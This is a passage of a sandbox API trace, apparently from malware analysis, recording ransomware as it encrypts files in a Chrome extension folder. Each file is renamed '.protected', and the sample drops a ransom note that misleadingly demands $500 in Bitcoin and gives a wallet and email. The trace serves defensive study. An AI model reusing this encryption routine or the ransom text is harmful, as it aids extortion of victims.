(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.732] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.732] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.732] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.732] CloseHandle (hObject=0x164) returned 1 [0078.732] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.732] lstrcmpiW (lpString1="it", lpString2="Windows") returned -1 [0078.732] lstrcmpiW (lpString1="it", lpString2="Program Files") returned -1 [0078.732] lstrcmpiW (lpString1="it", lpString2="Program Files (x86)") returned -1 [0078.732] lstrcmpiW (lpString1="it", lpString2="$Recycle.bin") returned 1 [0078.732] lstrcmpiW (lpString1="it", lpString2="System Volume Information") returned -1 [0078.732] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it") returned 141 [0078.732] lstrcmpW (lpString1="it", lpString2=".") returned 1 [0078.732] lstrcmpW (lpString1="it", lpString2="..") returned 1 [0078.732] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\*") returned 143 [0078.732] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.733] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.733] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.733] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.733] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.733] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.733] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\.") returned 143 [0078.733] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.733] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.733] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.733] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.733] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.733] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.733] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.733] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\..") returned 144 [0078.733] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.733] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.733] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.733] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.733] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.733] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.733] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.734] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.734] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json") returned 155 [0078.734] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.734] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.734] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.734] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.734] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json") returned 155 [0078.734] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.734] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json") returned 155 [0078.734] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.734] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json") returned 155 [0078.734] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.734] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0078.735] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.735] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0078.735] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.735] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.736] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.736] CloseHandle (hObject=0x168) returned 1 [0078.736] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.protected") returned 165 [0078.736] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.protected")) returned 1 [0078.736] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.736] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.736] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\RESTORE_FILES.txt") returned 159 [0078.736] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.737] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.737] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.737] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.737] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.737] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.737] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.738] CloseHandle (hObject=0x164) returned 1 [0078.738] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.738] lstrcmpiW (lpString1="ja", lpString2="Windows") returned -1 [0078.738] lstrcmpiW (lpString1="ja", lpString2="Program Files") returned -1 [0078.738] lstrcmpiW (lpString1="ja", lpString2="Program Files (x86)") returned -1 [0078.738] lstrcmpiW (lpString1="ja", lpString2="$Recycle.bin") returned 1 [0078.738] lstrcmpiW (lpString1="ja", lpString2="System Volume Information") returned -1 [0078.738] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja") returned 141 [0078.738] lstrcmpW (lpString1="ja", lpString2=".") returned 1 [0078.738] lstrcmpW (lpString1="ja", lpString2="..") returned 1 [0078.738] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\*") returned 143 [0078.738] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.738] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.738] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.738] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.738] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.738] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.738] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\.") returned 143 [0078.738] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.738] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.738] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.738] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.738] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.738] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.738] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.738] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\..") returned 144 [0078.738] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.739] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.739] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.739] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.739] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.739] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.739] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.739] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.739] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json") returned 155 [0078.739] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.739] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.739] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.739] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.739] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.739] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json") returned 155 [0078.739] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.739] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json") returned 155 [0078.739] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.739] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json") returned 155 [0078.739] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.739] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xec, lpOverlapped=0x0) returned 1 [0078.740] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.740] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xec, lpOverlapped=0x0) returned 1 [0078.740] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.740] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.740] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.740] CloseHandle (hObject=0x168) returned 1 [0078.740] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.protected") returned 165 [0078.741] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.protected")) returned 1 [0078.741] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.741] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.741] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\RESTORE_FILES.txt") returned 159 [0078.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.741] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.741] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.742] lstrlenA 